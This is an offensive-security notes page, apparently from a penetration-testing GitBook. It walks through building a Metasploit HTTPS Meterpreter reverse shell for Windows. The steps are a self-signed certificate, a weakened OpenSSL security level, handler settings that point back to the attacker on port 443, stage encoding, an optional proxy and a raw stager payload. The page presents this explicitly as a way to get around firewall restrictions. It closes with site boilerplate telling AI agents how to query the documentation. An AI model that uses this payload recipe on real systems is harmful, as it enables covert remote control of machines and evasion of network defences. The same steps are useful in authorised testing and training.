# HTTPs Meterpreter ## Overview > HTTPs Meterpreter is a type of Meterpreter shell that uses HTTPs protocol for communication between the attacker and the target system. This type of shell is commonly used in situations where the attacker needs to bypass firewall or network restrictions that may prevent other types of shells, such as reverse TCP or bind TCP, from working properly. ## Generating your own self signed certificate To generate your own self signed certificate: ```bash openssl req -new -x509 -nodes -out cert.crt -keyout priv.key ``` In order for the Metasploit to use the cert we will concatinate the private and public key to create us a .pem file ```bash cat priv.key cert.crt > rfc.pem ``` {% hint style="info" %} We also must change the *CipherString* in the /etc/ssl/openssl.cnf config file or our reverse HTTPS shell will not work properly. First, we will locate this line in the config file: ```bash CipherString=DEFAULT@SECLEVEL=2 ``` and change to to: ```bash CipherString=DEFAULT ``` {% endhint %} Finally, we can set it in our Metasploit instance: ```bash set StagerVerifySSLCert true set HandlerSSLCert /home/kali/self_cert/rfc.pem ``` ## Msfconsole generate payload To generate a Meterpreter payload: {% code overflow="wrap" %} ```bash msf6 > use windows/x64/meterpreter/reverse_https msf6 payload(windows/x64/meterpreter/reverse_https) > set LHOST tun0 LHOST => 192.168.45.5 msf6 payload(windows/x64/meterpreter/reverse_https) > set LPORT 443 LPORT => 443 msf6 payload(windows/x64/meterpreter/reverse_https) > set StagerVerifySSLCert true StagerVerifySSLCert => true msf6 payload(windows/x64/meterpreter/reverse_https) > set HandlerSSLCert ../../payloads/SpaceX.pem handlersslcert => ../../payloads/SpaceX.pem msf6 exploit(multi/handler) > set EnableStageEncoding true EnableStageEncoding => true ## optional proxy msf6 exploit(multi/handler) > set HttpProxyHost 172.16.20.50 HttpProxyHost => 172.16.20.50 msf6 exploit(multi/handler) > set HttpProxyPort 8080 HttpProxyPort => 8080 msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw -o spacex.bin ``` {% endcode %} ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rfc1918.gitbook.io/offsec/execution/metasploit/https-meterpreter.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.